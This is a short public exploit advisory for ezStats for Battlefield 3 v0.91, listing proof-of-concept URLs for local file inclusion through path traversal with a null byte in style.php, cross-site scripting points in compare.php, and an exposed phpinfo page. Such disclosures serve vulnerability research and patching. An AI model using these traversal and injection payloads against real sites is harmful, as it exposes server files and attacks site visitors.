ezStats For Battlefield 3 0.91 XSS & Local File Inclusion

2013.02.06

Credit: L0n3ly-H34rT

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-98

#################################################
### Exploit Title: ezStats for Battlefield 3 v0.91 Multiple Vulnerabilities
### Date: 02/05/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.ezstats.org/
### Software Link: http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip
### Tested on: Linux/Windows
#################################################
1- Local File Inclusion :
http://127.0.0.1/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://127.0.0.1/ezStats2/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
2- XSS :
http://127.0.0.1/ezStats2/compare.php?common=[XSS]
http://127.0.0.1/ezStats2/compare.php?rankings=[XSS]
############################################
# Notes :
1- Must be magic_quotes_gpc = Off
2- phpinfo() :
http://127.0.0.1/ezStats2/admin/apitest.php?info
# Greetz to my friendz

References:

http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip

http://www.ezstats.org/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ezStats For Battlefield 3 0.91 XSS & Local File Inclusion

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.